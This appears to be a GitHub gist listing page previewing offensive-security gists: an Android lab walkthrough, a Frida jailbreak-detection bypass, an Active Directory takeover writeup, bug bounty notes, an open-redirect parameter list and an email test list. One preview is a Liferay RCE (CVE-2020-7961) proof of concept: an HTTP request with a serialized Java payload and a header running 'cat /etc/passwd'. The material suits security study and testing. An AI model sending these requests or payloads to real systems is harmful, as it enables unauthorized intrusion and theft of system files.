Skip to content

Instantly share code, notes, and snippets.

View michaellcader's full-sized avatar
🏠
Working from home

MichaellCader michaellcader

🏠
Working from home
37 followers · 39 following
View GitHub Profile
@ruevaughn
ruevaughn / InsecureBankV2.tutorial.md
Last active September 27, 2024 09:29
InsecureBankV2 Android App Walkthrough

InsecureBankV2 Tutorial

This is a writeup of my solutions to the intentionally vulnerable Android app. wsIf you want to solve the challenge yourself, you can download the APK from here. In most cases I recommend trying the challenge yourself first before reading the solution. If you are new to testing Android Applications or Vulnerability Assessing in general, you may gain more out of it by reading and then attempting. Do what works for you.

Setup

Follow my Blog Post for instructions on setting up this lab or follow the instructions here. First we are going to cover the tools utilized and how to set them up, then I am going to cover the vulnerabilites found in this App.

@izadgot
izadgot / ios-jailbreak-detection-bypass.js
Last active February 24, 2025 22:31
This is a Frida script used for bypassing iOS jailbreak detection by hooking following methods/functions: fileExistsAtPath, fopen, canOpenURL, libSystemBFork
//Moved to https://github.com/Incognito-Lab/Frida-iOS-Jailbreak-detection-bypass
/*
This is a Frida script used for bypass iOS jailbreak detection by hooking following methods/functions
- fileExistsAtPath
- fopen
- canOpenURL
- libSystemBFork
This script is a modified version of Objection script: https://github.com/sensepost/objection/blob/master/agent/src/ios/jailbreak.ts
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@JamesHopbourn
JamesHopbourn / 含参数的 URL Scheme 收集.md
Last active May 14, 2025 13:01
含参数的 URL Scheme 收集.md
@OTaKuHP
OTaKuHP / Bug Bounty Checklist and Cheatsheets.md
Created June 11, 2021 03:42
@xhzeem
xhzeem / redirection_parameters
Created April 19, 2021 21:40
&return=/return
&return_url=/return_url
&returnurl=/returnurl
&redirect=/redirect
&redirect_url=redirect_url
&redirect_uri=redirect_uri
&redirecturl=redirecturl
&next=/next
&next_url=/next_url
&next_uri=/next_uri
@1nikolas
1nikolas / genymotion-4.x.md
Last active January 23, 2025 02:30
Install Android 4.1, 4.2, 4.3 on Genymotion

Install Android 4.1, 4.2, 4.3 on Genymotion

I found a way to install older Android versions (4.x) on latest version of Genymotion. I only tested it on Windows but it should work on Mac and Linux too. So here is what you need to do:

Step 1

Download the required Android image. I've reuploaded the files to Mega and saved them on the WayBack Machine.

@TheBinitGhimire
TheBinitGhimire / README.md
Last active October 27, 2024 19:26
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!

Dangling DNS Records on api.techprep.fb.com - $500!

Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

@pikpikcu
pikpikcu / LiferayRCE(CVE-2020-7961).md
Last active September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961) 
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
@m4ll0k
m4ll0k / gist:9cf22d4c76dbe0e1a0cc874f12c04963
Created January 28, 2021 20:56 — forked from cjaoude/gist:fd9910626629b53c4d25
Test list of Valid and Invalid Email addresses
Use: for testing against email regex
ref: http://codefool.tumblr.com/post/15288874550/list-of-valid-and-invalid-email-addresses
List of Valid Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]